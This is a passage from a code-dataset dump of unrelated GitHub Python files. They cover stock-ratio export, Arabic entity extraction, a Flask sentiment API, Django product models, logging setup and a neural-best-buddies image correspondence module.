Rate\": earnings_growth_rate,\r\n \"P/E Ratio\": pe_ratio,\r\n \"Dividend Yield\": dividend_yield\r\n }, ignore_index=True)\r\n\r\nfile_name = \"stock_ratios_\" + str(datetime.datetime.now().strftime(\"%Y-%m-%dT%H-%M-%S\")) + \".csv\"\r\n# Save the ratios DataFrame to a CSV file\r\nratios_df.to_csv(file_name, index=False)\r\n","repo_name":"enkredAbal/Stonks","sub_path":"Stonks/Fundamental_Ratios_yahoo.py","file_name":"Fundamental_Ratios_yahoo.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"529459152","text":"from src.svuchatbot_mogodb.client import get_collection\nfrom src.svuchatbot_preprocess.extractor import Extractor\nfrom camel_tools.ner import NERecognizer\n\n\nclass EntitiesExtractor(Extractor):\n @staticmethod\n def extract_entities_for_sentence(sent, ner):\n return [(word, label) for word, label in zip(sent, ner.predict_sentence(sent)) if not label.startswith(\"O\")]\n\n def do(self, ids):\n # documents = [d for d in self.col.find()]\n # print(len(documents))\n col = get_collection(self.db_name, self.col_name)\n cursor = col.find({\"_id\": {\"$in\": ids}})\n ner = NERecognizer.pretrained()\n # cursor = col.find({\"_id\": {\"$in\": ids}})\n if type(self.field_name) is list:\n for item in cursor:\n tmp = set([w for field in self.field_name for w in item[field]])\n item[\"entities\"] = EntitiesExtractor.extract_entities_for_sentence(tmp, ner)\n cursor.collection.replace_one({\"_id\": item[\"_id\"]}, item)\n else:\n for item in cursor:\n item[\"entities\"] = EntitiesExtractor.extract_entities_for_sentence(item[self.field_name], ner)\n cursor.collection.replace_one({\"_id\": item[\"_id\"]}, item)\n","repo_name":"AnasJS/svuchatbot","sub_path":"src/svuchatbot_preprocess/entities_extractor.py","file_name":"entities_extractor.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"9218417384","text":"import os\nfrom FeatureSelection import FeatureSelection\nimport pandas as pd\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, confusion_matrix\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn import svm\nfrom sklearn.feature_extraction.text import TfidfVectorizer,TfidfTransformer,CountVectorizer\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectKBest, chi2, mutual_info_classif\nimport math\n\ndf=pd.DataFrame()\n\n\n\ndef split_data(data,partition_by_id,category): #put this method under the open csv loop data must be in panda form\n data= data\n cat=category\n data['topic_bool']=data['topic'].map(lambda text :target_category(text,cat))\n for index,row in data.iterrows():\n if ( int(row['filename']) < partition_by_id ):\n y_train.append(row['topic_bool'])\n else:\n y_test.append(row['topic_bool'])\n\n\ndef target_category(text,target_cat):\n text=text[:-1]# strip last ;\n array=text.split(';')\n for x in array:\n if (x.startswith(target_cat)):\n return 1\n return 0\n\n\ncategory_matrix=[\"C1\",\"C11\",\"C12\",\"C13\",\"C14\",\"C15\",\"C151\",\"C1511\",\"C152\",\"C16\",\"C17\",\"C171\",\"C172\",\"C173\",\"C174\",\"C18\",\"C181\",\"C182\",\"C183\",\"C2\",\"C21\",\n\"C22\",\"C23\",\"C24\",\"C3\",\"C31\",\"C311\",\"C312\",\"C313\",\"C32\",\"C33\",\"C331\",\"C34\",\"C4\",\"C41\",\"C411\",\"C42\",\"C\",\"E1\",\"E11\",\"E12\",\"E121\",\"E13\",\n\"E131\",\"E132\",\"E14\",\"E141\",\"E142\",\"E143\",\"E2\",\"E21\",\"E211\",\"E212\",\"E3\",\"E31\",\"E311\",\"E312\",\"E313\",\"E4\",\"E41\",\"E411\",\"E5\",\"E51\",\"E511\",\n\"E512\",\"E513\",\"E6\",\"E61\",\"E7\",\"E71\",\"E\",\"G1\",\"G15\",\"G151\",\"G152\",\"G153\",\"G154\",\"G155\",\"G156\",\"G157\",\"G158\",\"G159\",\"G\",\"GCRIM\",\"GDEF\",\"GDIP\",\"GDIS\",\"GENT\",\"GENV\",\"GFAS\",\"GHEA\",\"GJOB\",\"GMIL\",\"GOBIT\",\"GODD\",\"GPOL\",\"GPRO\",\"GREL\",\"GSCI\",\"GSPO\",\"GTOUR\",\n\"GVIO\",\"GVOTE\",\"GWEA\",\"GWELF\",\"M1\",\"M11\",\"M12\",\"M13\",\"M131\",\"M132\",\"M14\",\"M141\",\"M142\",\"M143\",\"M\"]\n# category_matrix=[\"C\"]\ntrain_list=[]\ntest_list=[]\ni=0\nfor category in category_matrix:\n df=pd.DataFrame()\n y_train=[]\n y_test=[]\n partition_by_id=389827\n\n #use relative path\n for csv in os.listdir(\"../testspace2/csvs\"):\n data = pd.read_csv(\"../testspace2/csvs/\"+csv, encoding = 'iso-8859-1')\n split_data(data,partition_by_id,category)\n train_list.append(sum(y_train))\n test_list.append(sum(y_test))\n \ndf['categories']=category_matrix\ndf['train_docs']=train_list\ndf['test_docs']=test_list\ndf['percent_train']=df['train_docs']/len(y_train)\ndf['percent_test']=df['test_docs']/len(y_test)\n\n\ndf.to_csv('../testspace2/csvs2/exlpore.csv', index=False)\n\n\n\n\n","repo_name":"kostas1515/feature_selec_4_txt_class_using_time_seq","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"97"} +{"seq_id":"33208838151","text":"from flask import Flask, render_template, request, jsonify, make_response\nfrom review_classification.predict import make_prediction_raw\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef predict():\n \"\"\"View that handles the default get request and the post request when\n a form is submitted.\"\"\"\n\n # when the form is submitted this route gets a POST request\n if request.method == 'POST':\n review_text = request.form[\"text_input\"]\n\n # if no input provided\n if not review_text.strip():\n return render_template('index.html', error=\"No text provided.\")\n\n # catch any error during prediction\n try:\n predictions = make_prediction_raw([review_text])\n except Exception as e:\n return render_template('index.html', error=e)\n\n prediction = 'positive' if predictions[0] == 1 else 'negative'\n # finally render template with correct sentiment\n return render_template('index.html', prediction=prediction)\n\n # this is the 'home' route with a get request (no form submitted)\n else:\n return render_template('index.html')\n\n\n@app.route('/api/sentiment/v1', methods=['POST'])\ndef predict_api():\n \"\"\"\n JSON Response for requests over api\n waiting:\n '{\"input\": \"text\"}'\n returning:\n '{\"prediction\": \"positive\", \"error\" : \"\"}'\n \"\"\"\n\n # when the form is submitted this route gets a POST request\n if request.method == 'POST':\n review_text = request.json[\"input\"]\n\n # if no input provided\n if not review_text.strip():\n return jsonify({'prediction': \"\", 'error': \"No input text.\"}), 400\n\n # catch any error during prediction\n try:\n predictions = make_prediction_raw([review_text])\n except Exception as _:\n return jsonify({'prediction': \"\", 'error': \"Something wrong in server.\"}), 500\n\n prediction = 'positive' if predictions[0] == 1 else 'negative'\n # finally render template with correct sentiment\n return jsonify({'prediction': prediction})\n elif request.method == 'OPTIONS':\n # temporary solution for cross site resource sharing\n # later, a library can be used.\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"dlangCGI/ReviewSentiment","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"37094879364","text":"import requests\n\n\ndef get_dad_joke(joke_id=None):\n\n url = \"https://icanhazdadjoke.com/\"\n if joke_id:\n url += \"j/\" + joke_id\n headers = {\n \"Accept\": \"text/plain\",\n \"User-Agent\": \"https://github.com/out-running-27/dad_joke_cicd\",\n }\n\n r = requests.get(url, headers=headers)\n\n return r.text\n","repo_name":"out-running-27/dad_joke_cicd","sub_path":"jokes/dad_jokes.py","file_name":"dad_jokes.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"18471864139","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\n\n#categoria\nclass Categoria(models.Model):\n descricao = models.CharField(max_length=100)\n\n def __unicode__(self):\n return self.descricao\n\n def subCategorias(self):\n lista = SubCategoria.objects.filter(categoria_pai_id= self.id)\n return lista\n\n#sub-categoria\nclass SubCategoria(models.Model):\n descricao = models.CharField(max_length=100)\n categoria_pai = models.ForeignKey(Categoria)\n\n def __unicode__(self):\n return self.descricao\n\n\n#formato-produto\nclass FormatoProduto(models.Model):\n descricao = models.CharField(u'Formato do Produto', max_length=100)\n\n def __unicode__(self):\n return self.descricao\n\n\n# produto\nclass Produto (models.Model):\n nome = models.CharField(u'Nome', max_length=120,)\n formato = models.ForeignKey(FormatoProduto, null=True, blank=True)\n categoria = models.ForeignKey(Categoria)\n subcategoria = models.ForeignKey(SubCategoria, null=True, blank=True)\n descricao = models.TextField(\n u'Descrição do Produto',\n max_length=2048,\n )\n thumbnail = models.ImageField(\n u'Imagem Principal',\n null=True,\n blank=True,\n upload_to='produtos',\n )\n\n ativo = models.BooleanField(default=True)\n\n def __unicode__(self):\n return self.nome\n\n\nclass AlbumProduto(models.Model):\n produto = models.ForeignKey(Produto)\n img = models.ImageField(\n u'imagem 1',\n upload_to='produtos',\n )\n\n\nclass Galeria(models.Model):\n nome = models.CharField(\n u'Nome',\n max_length=120,\n )\n img1 = models.ImageField(\n u'imagem 1',\n upload_to='produtos/galeria',\n )\n img2 = models.ImageField(\n u'imagem 2',\n upload_to='produtos/galeria',\n )\n img3 = models.ImageField(\n u'imagem 3',\n upload_to='produtos/galeria',\n )\n img4 = models.ImageField(\n u'imagem 4',\n upload_to='produtos/galeria',\n )\n\n ativo = models.BooleanField(default=False)\n\n def __unicode__(self):\n return self.nome","repo_name":"andreximenes/dekori_project","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"37831877498","text":"import logging\nfrom settings import log_file_path\n\n# Logger LEVEL:\n# DEBUG: Detailed information, typically of interest only when diagnosing problems.\n# INFO: Confirmation that things are working as expected.\n# WARNING: An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected.\n# ERROR: Due to a more serious problem, the software has not been able to perform some function.\n# CRITICAL: A serious error, indicating that the program itself may be unable to continue running.\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s: %(module)s.py: %(levelname)s: %(message)s')\n\nfile_handler = logging.FileHandler(log_file_path)\nfile_handler.setFormatter(formatter)\n\nlogger.addHandler(file_handler)\n\n\ndef test_level():\n logger.debug('debug')\n logger.info('info')\n logger.warning('warning')\n logger.error('error')\n logger.critical('critical')\n\n\nif __name__ == '__main__':\n logger.info('--- START OF PROGRAM --- ')\n test_level()\n logger.info('--- END OF PROGRAM --- \\n')\n","repo_name":"ritonun/Apheleia-Inventory-System","sub_path":"aphe/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"11535626507","text":"def solution(n,a,b):\n answer = 1\n\n while(1):\n if (abs(a-b) == 1) & (max(a,b)%2 == 0):\n break\n else:\n answer+=1\n a = (a+1)//2\n b = (b+1)//2\n return answer\n\nprint(solution(8,4,7))\n","repo_name":"secretdsy/programmers","sub_path":"level2/practice/12985.py","file_name":"12985.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"31443374969","text":"# Copyright 2019 Orange and its contributors\r\n# This software is distributed under the terms and conditions of the 'Apache-2.0'\r\n# license which can be found in the file 'LICENSE' in this package distribution\r\n# or at 'http://www.apache.org/licenses/LICENSE-2.0'.\r\n\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(levelname)s %(message)s', filename='C:/Users/nzpb1414/PycharmProjects/meta_data_log.log')\r\nlogger = logging.getLogger(__name__)\r\n\r\nlogger.info('heelloo: Starts')\r\nlogger.debug('Meta-Data Test: Starts')","repo_name":"opnfv/moon","sub_path":"moon_manager/tests/func_tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"97"} +{"seq_id":"7384079492","text":"import os\nimport math\nimport torch\nimport torch.nn.functional as F\nfrom sklearn.cluster import KMeans\nfrom . import feature_metric as FM\nfrom utils import draw_correspondence as draw\nfrom utils import util\nfrom pprint import pprint\nimport time\n\n\nclass sparse_semantic_correspondence:\n \"\"\"稀疏 语义 一致性\"\"\"\n\n def __init__(self, model, gpu_ids, tau, border_size, save_dir, k_per_level, k_final, fast):\n \"\"\"\n :param model: vgg19, forward 设置 start/end level 得到中间层特征\n :param gpu_ids:\n :param tau: 0.05, 经验值,选择 较优的 NBBs\n :param border_size:\n :param save_dir: 中间层 一致性点 保存 dir\n :param k_per_level: 每层最多搜索的 pts 数量\n :param k_final: 每层最多保留的 pts 数量\n :param fast: True 保存到 level 2 截至, 1/2 feature map\n \"\"\"\n self.Tensor = torch.cuda.FloatTensor if gpu_ids else torch.Tensor\n self.model = model\n self.tau = tau\n self.border_size = border_size # 7\n self.save_dir = save_dir\n self.k_per_level = k_per_level\n self.k_final = k_final\n self.L_final = 2 if fast else 1 # fast 场景到 level2\n\n # define 5 levels\n self.patch_size_list = [[5, 5], [5, 5], [3, 3], [3, 3], [3, 3]] # 2*radius -1\n self.search_box_radius_list = [3, 3, 2, 2, 2]\n self.draw_radius = [2, 2, 2, 4, 8]\n self.pad_mode = 'reflect'\n\n def find_mapping(self, A, B, patch_size, initial_mapping, search_box_radius):\n \"\"\"\n :param A: F_Am_normalized 归一化特征单位向量\n :param B: F_Bm_normalized\n :param patch_size: [3, 3]\n :param initial_mapping: initial_map_a_to_b, identity_map, 坐标位 [i][j]\n :param search_box_radius: 2\n :return:\n \"\"\"\n A_to_B_map = self.Tensor(1, 2, A.size(2), A.size(3))\n\n dx, dy = math.floor(patch_size[0] / 2), math.floor(patch_size[1] / 2)\n pad_size = [dy, dy, dx, dx]\n\n # pad img, 考虑边缘\n A_padded = F.pad(A, pad_size, self.pad_mode)\n B_padded = F.pad(B, pad_size, self.pad_mode)\n\n # O(H*W * H*W)\n for i in range(A.size(2)): # H\n for j in range(A.size(3)): # W\n # patch A\n candidate_patch_A = A_padded[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] # 3*3\n index = self.find_closest_patch_index( # todo: 并行化\n B_padded,\n candidate_patch_A,\n initial_mapping[0, :, i, j], # (i,j)\n search_box_radius\n )\n # A (i,j) 对应于 B (index)\n A_to_B_map[:, :, i, j] = self.Tensor([index[0] - dx, index[1] - dy])\n\n return A_to_B_map\n\n def find_closest_patch_index(self, B, patch_A, inital_pixel, search_box_radius):\n \"\"\"\n :param B: B_padded feature\n :param patch_A: patch features C*3*3\n :param inital_pixel: initial_mapping[0, :, i, j] -> 初始 A 的 i,j; 寻找对应 B 上的区域\n :param search_box_radius: 2\n :return:\n \"\"\"\n dx, dy = math.floor(patch_A.size(2) / 2), math.floor(patch_A.size(3) / 2)\n search_dx = search_dy = search_box_radius # 搜索 radius, 点的半径 所在区域\n\n # 初始 A(i,j) 对应的 B 区域; 最深层二者映射是一样的,到了浅层 i,j 就会变换了\n up_boundary = int(inital_pixel[0] - search_dx) if inital_pixel[0] - search_dx > 0 else 0\n down_boundary = int(inital_pixel[0] + 2 * dx + search_dx + 1) if inital_pixel[0] + 2 * dx + search_dx + 1 < B.size(2) else B.size(2)\n left_boundary = int(inital_pixel[1] - search_dy) if inital_pixel[1] - search_dy > 0 else 0\n right_boundary = int(inital_pixel[1] + 2 * dy + search_dy + 1) if inital_pixel[1] + 2 * dy + search_dy + 1 < B.size(3) else B.size(3)\n\n # pad B 1*512*3*3 -> 1*512*5*5; pad 后 对每个位置 做 conv\n search_box_B = B[:, :, up_boundary:down_boundary, left_boundary:right_boundary]\n\n # patch_A 1*512*3*3 作为卷积核 weight\n # 将 search_box_B 从 512 -> 1 维\n result_B = F.conv2d(search_box_B, patch_A.contiguous()).data\n # print(patch_A.shape) # [1, 512, 3, 3]\n # print(search_box_B.shape) # [1, 512, 5, 5]\n # print(result_B.shape) # [1, 1, 3, 3]\n\n # cos distance\n distance = result_B\n # todo: 可能存在多个 max,返回一个即可\n _, _, max_i, max_j = torch.where(distance == distance.max())\n if len(max_i) > 1:\n max_i, max_j = max_i[0], max_j[0]\n # +dx, +dy 转换到 B patch 坐标系\n # +up_boundary, +left_boundary 转换到 B 全图坐标系\n closest_patch_index = [max_i + dx + up_boundary, max_j + dy + left_boundary]\n\n return closest_patch_index\n\n def warp(self, A_size, B, patch_size, mapping_a_to_b): # mapping_a_to_b\n \"\"\"\n 根据 mapping_a_to_b 将 A 对应 B 的区域 映射到 A 自身的位置\n \"\"\"\n assert (B.size() == A_size)\n [dx, dy] = [math.floor(patch_size[0] / 2), math.floor(patch_size[1] / 2)]\n B_padded = F.pad(B, [dy, dy, dx, dx], self.pad_mode)\n\n # 保存从 B 映射到的 A 中每个 patch 对应的 B feature\n warped_A = self.Tensor(B_padded.size()).fill_(0.0)\n\n counter = self.Tensor(B_padded.size()).fill_(0.0)\n patch_cnt = self.Tensor(B_padded.size(0), B_padded.size(1), patch_size[0], patch_size[1]).fill_(1.0)\n\n for i in range(A_size[2]):\n for j in range(A_size[3]):\n # A region 对应的 B region 添加到 A 中 (i,j) 位置\n ab_i, ab_j = map(int, mapping_a_to_b[0, :, i, j])\n # 因为 stride=1, 而 patch_size>1, patch 内部分 pixel 多次加 feature,所以用 counter 平均特征\n warped_A[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] += \\\n B_padded[:, :, ab_i:ab_i + 2 * dx + 1, ab_j:ab_j + 2 * dy + 1]\n counter[:, :, i:(i + 2 * dx + 1), j:(j + 2 * dy + 1)] += patch_cnt\n\n warped_A = warped_A[:, :, dx:(warped_A.size(2) - dx), dy:(warped_A.size(3) - dy)] / \\\n counter[:, :, dx:(warped_A.size(2) - dx), dy:(warped_A.size(3) - dy)]\n return warped_A\n\n def mapping_to_image_size(self, mapping, level, original_image_size):\n if level == 1:\n return mapping\n else:\n identity_map_L = self.identity_map(mapping.size())\n identity_map_original = self.identity_map(original_image_size)\n factor = int(math.pow(2, level - 1))\n return identity_map_original + self.upsample_mapping(mapping - identity_map_L, factor=factor)\n\n def upsample_mapping(self, mapping, factor=2):\n upsampler = torch.nn.Upsample(scale_factor=factor, mode='nearest')\n return upsampler(factor * mapping).data\n\n def normalize_0_to_1(self, F):\n assert (F.dim() == 4)\n max_val = F.max()\n min_val = F.min()\n if max_val != min_val:\n F_normalized = (F - min_val) / (max_val - min_val)\n else:\n F_normalized = self.Tensor(F.size()).fill_(0)\n\n return F_normalized\n\n def identity_map(self, size):\n \"\"\"\n C=2,存储 grid i,j 坐标,element-wise 组合可以得到 坐标位置\n :param size: feature tensor size, 1,512,14,14\n :return:\n \"\"\"\n idnty_map = self.Tensor(size[0], 2, size[2], size[3])\n # size[0] = 1\n idnty_map[0, 0, :, :].copy_(\n torch.arange(0, size[2]).repeat(size[3], 1).transpose(0, 1) # arange(size[2]), i; (W,H)->(H,W)\n )\n idnty_map[0, 1, :, :].copy_(\n torch.arange(0, size[3]).repeat(size[2], 1) # arange(size[3]), j\n )\n return idnty_map\n\n def find_neural_best_buddies(self, correspondence, F_A, F_B, F_Am, F_Bm, patch_size,\n initial_map_a_to_b, initial_map_b_to_a, search_box_radius,\n deepest_level=False):\n \"\"\"\n :param correspondence: 对应点 来自 上层\n :param F_A: model features\n :param F_B:\n :param F_Am: clone features\n :param F_Bm:\n :param patch_size: 对应 level 的 region patch 大小\n :param initial_map_a_to_b: 初始 i,j 坐标位, find_mapping 会更新得到 a_to_b, b_to_a\n :param initial_map_b_to_a:\n :param search_box_radius:\n :param deepest_level: 深层,控制\n :return:\n refined_correspondence\n a_to_b\n b_to_a\n \"\"\"\n # 归一化: feature vector -> 单位向量\n # 方便后面计算 feature vector 间 cos similarity\n F_Am_normalized = FM.normalize_per_pix(F_Am)\n F_Bm_normalized = FM.normalize_per_pix(F_Bm)\n\n # NN, d_max\n t1 = time.time()\n a_to_b = self.find_mapping(F_Am_normalized, F_Bm_normalized, patch_size, initial_map_a_to_b, search_box_radius)\n b_to_a = self.find_mapping(F_Bm_normalized, F_Am_normalized, patch_size, initial_map_b_to_a, search_box_radius)\n print('map time:', time.time() - t1)\n\n if deepest_level:\n # mutual NN, correspondence\n # return [[A_pts], [B_pts]] NBBs\n refined_correspondence = self.find_best_buddies(a_to_b, b_to_a)\n # cal rank activations\n # return [[A_pts], [B_pts], [rank_activations]]\n refined_correspondence = self.calculate_activations(refined_correspondence, F_A, F_B)\n else:\n refined_correspondence = correspondence\n for i in range(len(correspondence[0]) - 1, -1, -1):\n top_left_1, bottom_right_1 = self.extract_receptive_field(correspondence[0][i][0], correspondence[0][i][1], search_box_radius,\n [a_to_b.size(2), a_to_b.size(3)])\n top_left_2, bottom_right_2 = self.extract_receptive_field(correspondence[1][i][0], correspondence[1][i][1], search_box_radius,\n [a_to_b.size(2), a_to_b.size(3)])\n # 针对每个 patch, find_best_buddies\n refined_correspondence_i = self.find_best_buddies(a_to_b, b_to_a, top_left_1, bottom_right_1, top_left_2, bottom_right_2)\n refined_correspondence_i = self.calculate_activations(refined_correspondence_i, F_A, F_B)\n refined_correspondence = self.replace_refined_correspondence(refined_correspondence, refined_correspondence_i, i)\n\n return refined_correspondence, a_to_b, b_to_a\n\n def find_best_buddies(self, a_to_b, b_to_a,\n top_left_1=[0, 0],\n bottom_right_1=[float('inf'), float('inf')],\n top_left_2=[0, 0],\n bottom_right_2=[float('inf'), float('inf')]):\n \"\"\"\n :param a_to_b: A/B patch 内 i,j 映射\n :param b_to_a:\n :param top_left_1: # 后面四组坐标位; 中间层特征要使用; 表示1个 patch 范围\n :param bottom_right_1:\n :param top_left_2:\n :param bottom_right_2:\n :return:\n \"\"\"\n assert (a_to_b.size() == b_to_a.size())\n correspondence = [[], []] # A pts, B pts\n # number_of_cycle_consistencies = 0\n\n for i in range(top_left_1[0], min(bottom_right_1[0], a_to_b.size(2))):\n for j in range(top_left_1[1], min(bottom_right_1[1], a_to_b.size(3))):\n # 通过 A(i,j) -> a_to_b(i,j) A 对应于 B 的 i,j -> b_to_a(map)\n ab_i, ab_j = map(int, a_to_b[0, :, i, j]) # A->B\n aba_i, aba_j = b_to_a[0, :, ab_i, ab_j] # A->B->A\n\n d = FM.spatial_distance( # 判断二点 是否循环对应\n point_A=self.Tensor([i, j]),\n point_B=self.Tensor([aba_i, aba_j])\n )\n if d == 0: # 满足循环对应, long 型 tensor 不能直接和 float 比较\n if top_left_2[0] <= ab_i < bottom_right_2[0] and top_left_2[1] <= ab_j < bottom_right_2[1]:\n correspondence[0].append([i, j]) # A 中 i,j 对应\n correspondence[1].append([ab_i, ab_j]) # B 中 ab_i,ab_j\n # number_of_cycle_consistencies += 1\n\n # 每个 patch 内输出一组\n # print('number_of_cycle_consistencies:', number_of_cycle_consistencies)\n return correspondence\n\n def extract_receptive_field(self, x, y, radius, width):\n center = [2 * x, 2 * y]\n top_left = [max(center[0] - radius, 0), max(center[1] - radius, 0)]\n bottom_right = [min(center[0] + radius + 1, width[0]), min(center[1] + radius + 1, width[1])]\n return [top_left, bottom_right]\n\n def replace_refined_correspondence(self, correspondence, refined_correspondence_i, index):\n new_correspondence = correspondence\n activation = correspondence[2][index]\n new_correspondence[0].pop(index)\n new_correspondence[1].pop(index)\n new_correspondence[2].pop(index)\n\n for j in range(len(refined_correspondence_i[0])):\n new_correspondence[0].append(refined_correspondence_i[0][j])\n new_correspondence[1].append(refined_correspondence_i[1][j])\n new_correspondence[2].append(activation + refined_correspondence_i[2][j])\n\n return new_correspondence\n\n def calculate_activations(self, correspondence, F_A, F_B):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts]]\n :param F_A: feature map\n :param F_B:\n :return: response_correspondence\n [[A_pts], [B_pts]] + [rank_activations]\n \"\"\"\n # normalized featrue map\n # FM.response: l2 and min_max norm F_A, F_B -> [0, 1]\n self.H_A = FM.FA_to_HA_norm(F_A)\n self.H_B = FM.FA_to_HA_norm(F_B)\n\n response_correspondence = correspondence\n response_correspondence.append([])\n for i in range(len(correspondence[0])):\n # pts and activations\n pt_A, pt_B = correspondence[0][i], correspondence[1][i]\n response_A_i = self.H_A[0, 0, pt_A[0], pt_A[1]]\n response_B_i = self.H_B[0, 0, pt_B[0], pt_B[1]]\n # rank, add for each layer\n correspondence_avg_response_i = (response_A_i + response_B_i) * 0.5\n response_correspondence[2].append(correspondence_avg_response_i)\n return response_correspondence\n\n def limit_correspondence_number_per_level(self, correspondence, F_A, F_B, tau, top=5):\n correspondence_avg_response = self.Tensor(len(correspondence[0])).fill_(0)\n for i in range(len(correspondence[0])):\n correspondence_avg_response[i] = correspondence[2][i]\n\n top_response_correspondence = [[], [], []]\n if len(correspondence[0]) > 0:\n [sorted_correspondence, ind] = correspondence_avg_response.sort(dim=0, descending=True)\n for i in range(min(top, len(correspondence[0]))):\n top_response_correspondence[0].append(correspondence[0][ind[i]])\n top_response_correspondence[1].append(correspondence[1][ind[i]])\n top_response_correspondence[2].append(sorted_correspondence[i])\n\n return top_response_correspondence\n\n def threshold_response_correspondence(self, correspondence, H_A, H_B, th):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts], [rank_activation]]\n :param H_A: normalized activation map\n :param H_B:\n :param th: tau=0.05 response threshold\n :return:\n \"\"\"\n # mask\n M_A = H_A.ge(th)\n M_B = H_B.ge(th)\n # print('A mask:', M_A.sum()) # > thre 较多,但是二者位置能对应的的不多\n # print('B mask:', M_B.sum())\n\n high_correspondence = [[], [], []]\n\n # 遍历 对应点\n for i in range(len(correspondence[0])):\n M_A_i = M_A[0, 0, correspondence[0][i][0], correspondence[0][i][1]]\n M_B_i = M_B[0, 0, correspondence[1][i][0], correspondence[1][i][1]]\n # 只判断 第0维 feature 是否 > 0.05?\n if M_A_i and M_B_i:\n high_correspondence[0].append(correspondence[0][i])\n high_correspondence[1].append(correspondence[1][i])\n high_correspondence[2].append(correspondence[2][i])\n\n return high_correspondence\n\n def make_correspondence_unique(self, correspondence):\n unique_correspondence = correspondence\n for i in range(len(unique_correspondence[0]) - 1, -1, -1):\n for j in range(i - 1, -1, -1):\n if self.is_same_match(unique_correspondence[0][i], unique_correspondence[0][j]):\n unique_correspondence[0].pop(i)\n unique_correspondence[1].pop(i)\n unique_correspondence[2].pop(i)\n break\n\n return unique_correspondence\n\n def remove_border_correspondence(self, correspondence, border_width, image_width):\n filtered_correspondence = correspondence\n for i in range(len(filtered_correspondence[0]) - 1, -1, -1):\n x_1 = filtered_correspondence[0][i][0]\n y_1 = filtered_correspondence[0][i][1]\n x_2 = filtered_correspondence[1][i][0]\n y_2 = filtered_correspondence[1][i][1]\n if x_1 < border_width or x_1 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif x_2 < border_width or x_2 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif y_1 < border_width or y_1 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n elif y_2 < border_width or y_2 > image_width - border_width:\n filtered_correspondence[0].pop(i)\n filtered_correspondence[1].pop(i)\n filtered_correspondence[2].pop(i)\n\n return filtered_correspondence\n\n def is_same_match(self, corr_1, corr_2):\n if corr_1[0] == corr_2[0] and corr_1[1] == corr_2[1]:\n return True\n\n def scale_correspondence(self, correspondence, level):\n scaled_correspondence = [[], [], []]\n scale_factor = int(math.pow(2, level - 1))\n for i in range(len(correspondence[0])):\n scaled_correspondence[0].append([scale_factor * correspondence[0][i][0], scale_factor * correspondence[0][i][1]])\n scaled_correspondence[1].append([scale_factor * correspondence[1][i][0], scale_factor * correspondence[1][i][1]])\n scaled_correspondence[2].append(correspondence[2][i])\n\n return scaled_correspondence\n\n def save_correspondence_as_txt(self, correspondence, name=''):\n self.save_points_as_txt(correspondence[0], 'correspondence_A' + name)\n self.save_points_as_txt(correspondence[1], 'correspondence_Bt' + name)\n\n def save_points_as_txt(self, points, name):\n file_name = os.path.join(self.save_dir, name + '.txt')\n with open(file_name, 'wt') as opt_file:\n for i in range(len(points)):\n opt_file.write('%i, %i\\n' % (points[i][0], points[i][1]))\n\n def top_k_in_clusters(self, correspondence, k):\n \"\"\"\n :param correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n :param k:\n :return: top_cluster_correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n \"\"\"\n if k > len(correspondence[0]):\n return correspondence\n\n correspondence_R_4 = []\n for i in range(len(correspondence[0])):\n correspondence_R_4.append([ # 聚类特征向量 dim=4, 由2组对应的空间坐标组成\n correspondence[0][i][0],\n correspondence[0][i][1],\n correspondence[1][i][0],\n correspondence[1][i][1]\n ])\n\n top_cluster_correspondence = [[], [], []]\n # print(\"Calculating K-means...\")\n kmeans = KMeans(n_clusters=k, random_state=0).fit(correspondence_R_4)\n labels = kmeans.labels_\n\n # 取每个簇 i 下的极值 idx\n cluster = {\n i: {'max_activation': 0, 'max_activation_idx': -1}\n for i in range(k)\n }\n\n for j in range(len(correspondence[0])):\n if correspondence[2][j] > 